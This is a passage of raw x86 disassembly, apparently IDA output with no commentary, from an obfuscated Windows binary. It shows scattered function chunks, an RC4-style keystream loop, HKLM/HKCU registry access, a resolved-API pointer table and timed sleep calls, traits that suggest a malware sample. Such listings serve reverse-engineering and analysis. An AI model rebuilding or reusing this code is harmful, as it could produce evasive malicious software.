loc_9ADA08: ; CODE XREF: sub_9B04A8+3EB5�j
; sub_9B04A8+4093�j
push dword ptr [ebp-4044h]
pop eax
test eax, eax
jz loc_9AFD43
jmp off_9B8F5C
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9ACF9C
loc_9ADA23: ; CODE XREF: sub_9ACF9C+37�j
; sub_9ACF9C+1FE6�j ...
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; END OF FUNCTION CHUNK FOR sub_9ACF9C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B2F1C
loc_9ADA40: ; CODE XREF: sub_9B2F1C-3996�j
; DATA XREF: .text:off_9B8DDF�o
mov cl, [ebp+28h]
mov [esi+eax], cl
inc eax
mov [ebp-1Ch], eax
mov cx, [ebp+2Ch]
mov [esi+eax], cx
movzx ecx, cx
add eax, 2
mov [ebp-1Ch], eax
lea edx, [eax+ecx]
cmp edx, 1FFCh
jbe loc_9B22F0
jmp off_9BA02D
; END OF FUNCTION CHUNK FOR sub_9B2F1C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AEAAC
loc_9ADA70: ; CODE XREF: sub_9AEAAC+4E�j
lea edx, [eax+eax*4]
mov dword_9BEC20[edx*8], ecx
inc eax
jmp loc_9AEAEE
; END OF FUNCTION CHUNK FOR sub_9AEAAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3984
loc_9ADA80: ; CODE XREF: sub_9B3984-7B59�j
lea ecx, [ebp+var_404C]
push ecx
push ebx
push 6
lea edx, [ebp+var_4034]
push edx
lea ecx, [ebp+var_4044]
push ecx
add eax, 0FFFFFFFEh
push eax
lea ecx, [ebp+var_201E]
lea edx, [ebp+var_4022]
call sub_9B3864
push [ebp+var_404C]
pop eax
and eax, eax
jz loc_9AB89C
jmp loc_9ABDA0
; END OF FUNCTION CHUNK FOR sub_9B3984
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9ADAC4 proc near ; DATA XREF: .text:off_9B9F6A�o
; FUNCTION CHUNK AT 009AAEC8 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 009AAF9C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009AB414 SIZE 00000030 BYTES
; FUNCTION CHUNK AT 009AB8E0 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 009ABE30 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009ABFB4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009AD37C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009AD454 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009AD4EB SIZE 00000036 BYTES
; FUNCTION CHUNK AT 009AD64C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009ADCDC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009AE20C SIZE 00000047 BYTES
; FUNCTION CHUNK AT 009AE6A8 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 009AF35C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 009AF9F4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009AF9FC SIZE 00000039 BYTES
; FUNCTION CHUNK AT 009AFD94 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B0BC0 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 009B1BF8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B2224 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009B296C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B2AF8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B2DA0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009B3110 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009B326C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B3334 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 009B42D8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B4CB0 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009B4EB8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B5E5C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B6318 SIZE 00000024 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B8F2D
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 78h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
mov [ebp-18h], esp
push dword ptr [ebp+8]
pop edi
mov [ebp-54h], edi
sub esi, esi
mov eax, [edi+0Ch]
mov [ebp-50h], eax
mov si, [edi+10h]
sub eax, eax
jmp loc_9AE20C
sub_9ADAC4 endp
; =============== S U B R O U T I N E =======================================
sub_9ADB10 proc near ; CODE XREF: sub_9B27D8-31FB�j
; FUNCTION CHUNK AT 009B0170 SIZE 00000037 BYTES
push ebx
pop edi
dec edi
loc_9ADB13: ; CODE XREF: sub_9ADB10+9�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_9ADB13
jmp loc_9B0170
sub_9ADB10 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AFF64
loc_9ADB20: ; CODE XREF: sub_9AFF64+132C�j
call sub_9AE860
add esp, 0Ch
push eax
lea edx, [ebp+var_120]
push edx
push 80000002h
pop edx
push dword_9BBE3C
pop ecx
call sub_9B3A74
push eax
pop esi
mov [ebp+var_230], esi
lea eax, [ebp+var_224]
push eax
push 8
push dword_9BBD28
pop ecx
push ecx
call sub_9AE860
add esp, 0Ch
push eax
lea edx, [ebp+var_120]
push edx
push 80000001h
pop edx
push dword_9BBE3C
pop ecx
call sub_9B3A74
cmp esi, edi
mov [ebp+var_22C], eax
jnz loc_9ACBD4
jmp loc_9B3DF0
; END OF FUNCTION CHUNK FOR sub_9AFF64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9ADB90: ; CODE XREF: sub_9B1A08-5674�j
; DATA XREF: .text:off_9B9785�o
push 1
pop eax
jmp loc_9B351E
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9ADB98: ; CODE XREF: sub_9B4950-1FEC�j
; DATA XREF: .text:off_9B9E9F�o
lea eax, [ecx+ecx*4]
shl eax, 3
cmp dword_9BEC1C[eax], ebx
jz loc_9B3BE0
jmp off_9B9CF7
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3EFC
loc_9ADBB0: ; CODE XREF: sub_9B3EFC+25�j
; DATA XREF: .text:off_9B974B�o
mov ecx, eax
and ecx, 0FF000000h
jz loc_9AD6E0
jmp off_9BAA3E
; END OF FUNCTION CHUNK FOR sub_9B3EFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9ADBC4: ; CODE XREF: sub_9AF25C-387D�j
; DATA XREF: .text:off_9BAAA9�o
cmp edi, ebx
jbe loc_9B5344
jmp loc_9B46B4
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4BF8
loc_9ADBD4: ; CODE XREF: sub_9B4BF8+C�j
sub eax, edx
push eax
push ebx
mov eax, esi
call sub_9B5100
lea edx, [ebp+8]
push edx
push 4
pop edi
call sub_9AC6A0
push off_9B9EF1
call sub_9AC6A0
add esp, 10h
; END OF FUNCTION CHUNK FOR sub_9B4BF8
; START OF FUNCTION CHUNK FOR sub_9ABC20
loc_9ADBF9: ; CODE XREF: sub_9ABC20+9EA4�j
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_9B1E69
; END OF FUNCTION CHUNK FOR sub_9ABC20
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9ADC08: ; CODE XREF: sub_9AB1A0-183�j
; DATA XREF: .text:off_9BA168�o
lea eax, [esi+esi*4]
shl eax, 3
push dword_9BEC1C[eax]
pop ecx
test ecx, ecx
jz loc_9ACCA6
jmp off_9B9F5E
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACA48
loc_9ADC24: ; CODE XREF: sub_9ACA48+A9�j
; DATA XREF: .text:off_9B8D6D�o
mov dword ptr [ebp-404Ch], 0
loc_9ADC2E: ; CODE XREF: sub_9B19D8+1AD0�j
cmp dword ptr [ebp-404Ch], 7D0h
jge loc_9B5E0C
jmp loc_9B109C
; END OF FUNCTION CHUNK FOR sub_9ACA48
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9ADC44: ; CODE XREF: sub_9B0930-48B5�j
push off_9B9224
mov eax, [eax]
push eax
call esi
push dword_9BCB74
pop ecx
mov edx, [ecx+10h]
mov [edx+14h], eax
push dword_9BCB74
pop eax
push dword ptr [eax+10h]
pop eax
push dword ptr [eax+14h]
pop ecx
and ecx, ecx
jz loc_9B23EF
jmp loc_9B245C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9ADC78: ; CODE XREF: sub_9B63D8-7C0C�j
; DATA XREF: .text:off_9B9A8B�o
push dword_9BCB74
pop eax
push dword ptr [eax]
pop ecx
call dword ptr [ecx+30h]
sub eax, [ebp-214Ch]
push dword ptr [ebp-2140h]
pop ecx
mov [ecx], eax
jnz loc_9AF306
jmp off_9BAED1
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9ADCA0: ; CODE XREF: sub_9B1A08-3C6D�j
cmp eax, 0FFFFFFFFh
jz loc_9B4C4A
jmp loc_9B4C3C
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9ADCB0: ; CODE XREF: sub_9AB1A0+5389�j
mov esi, dword_9BEC30[esi]
cmp esi, 0FEFFFFFFh
jz loc_9B2911
jmp off_9B97B9
; ---------------------------------------------------------------------------
loc_9ADCC8: ; CODE XREF: sub_9AB1A0+A73E�j
; DATA XREF: .text:off_9B92AA�o
mov eax, dword_9BEBD0
or eax, eax
jle loc_9B5B2C
jmp off_9BA3F8
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9ADCDC: ; CODE XREF: sub_9ADAC4-268C�j
; sub_9ADAC4+71FE�j ...
mov esi, [ebp-4Ch]
loc_9ADCDF: ; CODE XREF: sub_9ADAC4+57AB�j
or ebx, ebx
jz loc_9B0BD3
jmp loc_9AD37C
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; =============== S U B R O U T I N E =======================================
sub_9ADCEC proc near ; CODE XREF: sub_9B2F1C-4891�p
; FUNCTION CHUNK AT 009AB4EC SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009AB870 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 009ACE2C SIZE 00000026 BYTES
; FUNCTION CHUNK AT 009AE3D3 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 009AEB4C SIZE 00000008 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BA154
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp-18h], esp
mov eax, dword_9BCB74
push ecx
pop ebx
push dword ptr [eax]
pop ecx
push off_9B94D7
call dword ptr [ecx+18h]
mov dword ptr [ebp-4], 0
push off_9B88FC
pop esi
push ebx
pop edi
push 6
pop ecx
rep movsd
movsw
push dword_9BEBD4
pop eax
jmp loc_9AB4EC
sub_9ADCEC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9ADD4C: ; CODE XREF: sub_9B1A08+3A44�j
; DATA XREF: .text:off_9BB09B�o
lea eax, [ebp+var_404C]
xor edi, edi
mov esi, [ebp+var_41E4]
call sub_9AC128
lea edx, [ebp+var_402C]
push edx
lea eax, [ebp+var_41F8]
push eax
lea ecx, [ebp+var_201C]
push ecx
push esi
push 11h
push [ebp+var_41EC]
pop edx
push edx
lea eax, [ebp+var_404C]
push eax
jmp off_9B99F2
; ---------------------------------------------------------------------------
loc_9ADD8C: ; CODE XREF: sub_9B1A08-2B09�j
; sub_9B1A08+A9�j ...
push [ebp+var_41E4]
pop eax
or eax, eax
jz loc_9B4C4A
jmp loc_9ADCA0
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; =============== S U B R O U T I N E =======================================
sub_9ADDA4 proc near ; CODE XREF: sub_9ACEE8+409E�p
; FUNCTION CHUNK AT 009AC55C SIZE 0000002C BYTES
; FUNCTION CHUNK AT 009AC9C8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009ACB7C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009ACC20 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009AE030 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009AE473 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009AE71C SIZE 00000028 BYTES
; FUNCTION CHUNK AT 009AE8A4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009AED3C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009AF1E0 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009AF238 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009AF4E8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B0E64 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009B1390 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009B1C08 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 009B2210 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B2260 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009B2BE4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009B30C8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B5468 SIZE 00000017 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B922E
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 26Ch
push ebx
push esi
push edi
xor edi, edi
mov [ebp-18h], esp
sub ecx, ecx
mov [ebp-4], edi
loc_9ADDD8: ; CODE XREF: sub_9ADDA4+1750�j
mov [ebp-1Ch], ecx
cmp ecx, 93h
jnb loc_9B30C8
jmp loc_9ACB7C
sub_9ADDA4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9ADDEC: ; CODE XREF: sub_9B1F68+3F85�j
lea eax, [edx+edx*2]
shl eax, 2
mov ecx, [eax+ebp-248h]
test ecx, ecx
jnz loc_9B1480
jmp off_9BA7C5
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AC32C
loc_9ADE10: ; CODE XREF: sub_9AC32C+7E03�j
mov ecx, dword_9BCB74
push dword ptr [ecx+10h]
pop edx
lea eax, [esp+324h+var_208]
push eax
push esi
call dword ptr [edx+58h]
test eax, eax
jz loc_9AEF93
jmp off_9B9F0F
; END OF FUNCTION CHUNK FOR sub_9AC32C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9ADE34: ; CODE XREF: sub_9B1D80-249F�j
mov ecx, [edi+4]
call sub_9B0FD0
jmp loc_9B1D5B
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9ADE44 proc near ; CODE XREF: sub_9B2C30+E�j
; FUNCTION CHUNK AT 009B6038 SIZE 00000001 BYTES
push ebx
loc_9ADE45: ; CODE XREF: sub_9ADE44+49�j
mov cl, [eax]
mov bl, [eax+1]
inc cl
mov [eax], cl
movzx ecx, cl
mov dl, [eax+ecx+2]
add bl, dl
lea ecx, [eax+ecx+2]
mov dl, bl
mov [eax+1], bl
mov bl, [ecx]
movzx edx, dl
mov dl, [eax+edx+2]
mov [ecx], dl
movzx ecx, byte ptr [eax+1]
mov [eax+ecx+2], bl
movzx ecx, byte ptr [eax]
movzx edx, byte ptr [eax+1]
mov dl, [eax+edx+2]
add dl, [eax+ecx+2]
movzx ecx, dl
mov dl, [eax+ecx+2]
mov [esi], dl
inc esi
dec edi
jnz short loc_9ADE45
jmp loc_9B6038
sub_9ADE44 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9ADE94: ; CODE XREF: sub_9B63D8-A9BC�j
mov eax, [ebp-2124h]
add eax, 0FFFFFFFCh
cmp edx, eax
jge loc_9AF944
jmp loc_9B5B20
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9ADEAC: ; CODE XREF: sub_9B0930+358D�j
push off_9B9717
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
push dword ptr [edx+10h]
pop ecx
mov [ecx+50h], eax
push dword_9BCB74
pop edx
push dword ptr [edx+10h]
pop eax
mov ecx, [eax+50h]
test ecx, ecx
jz loc_9B23EF
jmp loc_9B51EC
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9ADEE0: ; CODE XREF: sub_9B3864+2C32�j
; DATA XREF: .text:off_9B98A3�o
push 0
push 0
push 0
push 0
mov eax, [ebp+var_2028]
add ebx, eax
push ebx
mov ecx, [ebp+var_2064]
push ecx
jmp loc_9B3D77
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ABD30
loc_9ADF00: ; CODE XREF: sub_9ABD30+188F�j
; DATA XREF: .text:off_9B998E�o
movzx eax, word ptr [ebp+0]
and eax, eax
jz loc_9B591C
jmp off_9B9797
; END OF FUNCTION CHUNK FOR sub_9ABD30
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AFC28
loc_9ADF17: ; CODE XREF: sub_9AFC28-448A�j
; sub_9AFC28-111B�j ...
mov [ebp+var_4], 0FFFFFFFFh
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 18h
; END OF FUNCTION CHUNK FOR sub_9AFC28
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9ADF3C: ; CODE XREF: sub_9B63D8+A7�j
; DATA XREF: .text:off_9BAE41�o
cmp word ptr [esi+8], 2
jnz loc_9AF944
jmp off_9BA8E0
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B3EFC
loc_9ADF50: ; CODE XREF: sub_9B3EFC-5495�j
; DATA XREF: .text:off_9B87BF�o
cmp eax, 5958C0h
jz loc_9AD6E0
jmp off_9BAB6E
; END OF FUNCTION CHUNK FOR sub_9B3EFC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B19D8
loc_9ADF64: ; CODE XREF: sub_9B19D8+2A�j
mov eax, [ebp-405Ch]
test eax, eax
jz loc_9B5E0C
jmp off_9B920B
; END OF FUNCTION CHUNK FOR sub_9B19D8
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B3618
loc_9ADF7B: ; CODE XREF: sub_9B3618+4C�j
mov [ebp+var_4], 0FFFFFFFFh
movsx eax, [ebp+var_19]
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B3618
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B36E8
loc_9ADF98: ; CODE XREF: sub_9B36E8-724F�j
or esi, esi
js loc_9ACE6D
jmp off_9B89CA
; END OF FUNCTION CHUNK FOR sub_9B36E8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB040
loc_9ADFA8: ; CODE XREF: sub_9AB040+B516�j
mov eax, dword_9BCB74
mov ecx, [eax]
push off_9BAD92
call dword ptr [ecx+1Ch]
mov eax, edi
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_9AB040
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3408
loc_9ADFBC: ; CODE XREF: sub_9B3408+368�j
; DATA XREF: .text:off_9BA690�o
lea ecx, [ebp-12Ch]
call sub_9B5480
push dword ptr [ebp-12Ch]
pop esi
loc_9ADFCE: ; CODE XREF: sub_9B3408+362�j
mov dword ptr [ebp-4], 0FFFFFFFFh
jmp loc_9B62E4
; END OF FUNCTION CHUNK FOR sub_9B3408
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9ADFDC: ; CODE XREF: sub_9AB1A0+4FCA�j
mov ecx, dword_9BEC28[eax]
test ecx, ecx
jz loc_9ACCA6
jmp loc_9ACC88
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 10h
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AEE5C
loc_9ADFF4: ; CODE XREF: sub_9AEE5C+A�j
; DATA XREF: .text:off_9B9579�o
push esi
lea esi, [edx+4]
cmp esi, 40h
ja loc_9B5A71
jmp off_9B87B0
; END OF FUNCTION CHUNK FOR sub_9AEE5C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AE008: ; CODE XREF: sub_9B1A08-231�j
mov [ebp+var_41E0], 0
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push 1388h
call dword ptr [eax+4]
push [ebp+var_41F4]
pop esi
jmp loc_9B1A92
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9AE030: ; CODE XREF: sub_9ADDA4+FA6�j
xor ebx, ebx
xor ecx, ecx
loc_9AE034: ; CODE XREF: sub_9ADDA4+447A�j
mov [ebp-28h], esi
mov [ebp-24h], ebx
mov [ebp-1Ch], ecx
cmp ecx, edi
jge loc_9B0E64
jmp loc_9B2210
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9AE04C: ; CODE XREF: sub_9B1F68-51BD�j
; DATA XREF: .text:off_9BAB80�o
shl esi, 2
jmp loc_9AC640
; ---------------------------------------------------------------------------
loc_9AE054: ; CODE XREF: sub_9B1F68-4A1�j
; DATA XREF: .text:off_9B8A0A�o
push dword ptr [ebp-3Ch]
pop eax
dec eax
mov [ebp-3Ch], eax
mov ecx, [ebp+eax*4-3E0h]
mov [ebp-44h], ecx
push 1
push ebx
call sub_9B0E7C
call sub_9B46CC
mov [ebp-5Ch], eax
push eax
lea esi, [ebp-70h]
push dword ptr [ebp-44h]
pop eax
call sub_9AC250
call sub_9B45AC
shl eax, 1
not eax
and eax, 2
xor edx, edx
mov dx, [ebp+eax*4-70h]
push edx
xor eax, eax
mov edx, [ebp-44h]
lea esi, [ebp-2Ch]
call sub_9B1334
mov eax, dword_9BCB74
push dword ptr [eax+10h]
pop ecx
push 10h
mov edx, esi
push edx
jmp sub_9B2C70
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B31A8
loc_9AE0B8: ; CODE XREF: sub_9B31A8-1EA7�j
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
push 1388h
call dword ptr [edx+4]
jmp loc_9B12F1
; END OF FUNCTION CHUNK FOR sub_9B31A8
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AE0D3: ; CODE XREF: sub_9B3864-43D8�j
; sub_9B3864+539�j
mov [ebp+var_4], 0FFFFFFFFh
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
push [ebp+var_1C]
pop ecx
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 18h
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AE0FC: ; CODE XREF: sub_9B0930-1637�j
; DATA XREF: .text:off_9B9707�o
push off_9B9910
push dword ptr [eax]
pop ecx
push ecx
call esi
push dword_9BCB74
pop edx
push dword ptr [edx+10h]
pop ecx
mov [ecx+28h], eax
push dword_9BCB74
pop edx
push dword ptr [edx+10h]
pop eax
mov ecx, [eax+28h]
test ecx, ecx
jz loc_9B23EF
jmp off_9BB00E
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9AE134: ; CODE XREF: sub_9AB1A0+9BD8�j
lea esi, [ebx+ebx*4]
shl esi, 3
mov eax, dword_9BEC1C[esi]
test eax, eax
jz loc_9ABD29
jmp off_9BA410
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AE150: ; CODE XREF: sub_9B0930+1358�j
push off_9B9747
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
mov ecx, [edx+10h]
mov [ecx+48h], eax
push dword_9BCB74
pop edx
push dword ptr [edx+10h]
pop eax
mov ecx, [eax+48h]
test ecx, ecx
jz loc_9B23EF
jmp off_9B8C60
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B6264
loc_9AE18F: ; CODE XREF: sub_9B6264-590�j
; sub_9B6264+62�j
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-9A0h]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
push dword ptr [ebp-1Ch]
pop ecx
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B6264
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AE400
loc_9AE1B8: ; CODE XREF: sub_9AE400+1502�j
mov [ebp+var_1C], 1
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push 4E20h
call dword ptr [eax+4]
jmp loc_9B43AB
; END OF FUNCTION CHUNK FOR sub_9AE400
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AE1D8: ; CODE XREF: sub_9B1A08-2B0F�j
lea edx, [edi+ebp-41DCh]
push [ebp+var_41EC]
pop ecx
push ecx
mov ecx, [ebp+var_41E4]
call sub_9AB7C0
mov eax, [ebx]
or eax, eax
jz loc_9B59AB
jmp loc_9B59A0
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9AE20C: ; CODE XREF: sub_9ADAC4+47�j
or ebx, 0FFFFFFFFh
mov [ebp-4Ch], esi
xor ecx, ecx
mov [ebp-4], eax
mov [ebp-44h], ebx
mov [ebp-84h], eax
mov [ebp-80h], ecx
mov [ebp-7Ch], ecx
mov [ebp-78h], ecx
mov [ebp-74h], ecx
mov [ebp-70h], ecx
mov [ebp-6Ch], ecx
mov [ebp-68h], ecx
mov [ebp-64h], ecx
mov [ebp-60h], ecx
push 6
movzx edx, si
push edx
call sub_9AE400
and eax, eax
jz loc_9B4EB8
jmp loc_9B42D8
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AE254: ; CODE XREF: sub_9B0930-2F40�j
push dword ptr [eax+10h]
pop edx
test edx, edx
jz loc_9B23EF
jmp loc_9AE574
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4480
loc_9AE268: ; CODE XREF: sub_9B4480-69C�j
mov esi, 1
mov [ebp+var_334], esi
loc_9AE273: ; CODE XREF: sub_9B4480-2F24�j
; sub_9B4480-6A2�j
push dword_9BCB74
pop eax
push dword ptr [eax+0Ch]
pop ecx
mov edx, [ebp+var_330]
push edx
call dword ptr [ecx+14h]
